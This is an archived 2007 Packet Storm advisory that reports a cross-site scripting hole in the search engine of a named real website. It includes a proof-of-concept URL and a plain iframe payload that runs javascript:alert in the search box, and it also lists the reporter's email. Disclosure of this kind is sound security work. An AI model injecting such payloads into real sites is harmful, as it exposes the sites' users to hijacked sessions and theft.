telemark-xss.txt

2007-08-31T00:00:00
ID PACKETSTORM:58990
Type packetstorm
Reporter Tosser
Modified 2007-08-31T00:00:00

Description

                                        
                                            `# Title : Telemark XSS  
  
# Description : The Telemark (telemark.com) search engine is vulnerable to XSS  
  
# Author : Tosser  
  
# E-mail : ht7015@gmail.com  
  
# Proof : http://telemark.com/results-b.jsp?searchTerm=%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2Fiframe%3E&x=51&y=11&domainName=telemark.com&w=false&afdt=In51F73BbzMKEwiLy6KLpZ6OAhUJGRoKHfV_kdQYAyAAMNmNlQ84DQ&searchbox=y  
or go to telemark.com and type "<iframe src="javascript:alert('XSS')"></iframe>" in the search box.`